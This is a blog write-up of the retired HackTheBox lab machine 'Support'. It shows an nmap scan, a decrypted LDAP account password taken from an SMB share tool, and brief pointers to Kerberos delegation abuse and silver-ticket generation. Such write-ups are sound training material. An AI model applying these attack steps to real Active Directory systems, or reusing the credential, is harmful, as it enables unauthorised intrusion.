Hackthebox - Support

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Nmap 7.92 scan initiated Sun Jul 31 00:30:10 2022 as: nmap -sC -sC -vvv -oN nmap/support 10.129.25.223
Nmap scan report for 10.129.25.223
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2022-07-31 00:30:11 IST for 59s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127

Host script results:
| smb2-time:
| date: 2022-07-30T19:00:19
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: -16s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24642/tcp): CLEAN (Timeout)
| Check 2 (port 33552/tcp): CLEAN (Timeout)
| Check 3 (port 60212/udp): CLEAN (Timeout)
| Check 4 (port 41152/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun Jul 31 00:31:10 2022 -- 1 IP address (1 host up) scanned in 60.11 seconds

SMB Shares

Files in support-tools

UserInfo

Username and Password seem to be Encrypted with
armando as Key and

Using replit

we get the decrypted password as

1
2
support\\ldap
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Checking the credential on winrm

we see it is a valid credential

Privilage Escalation

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

Generating Silver Ticket

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/support/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.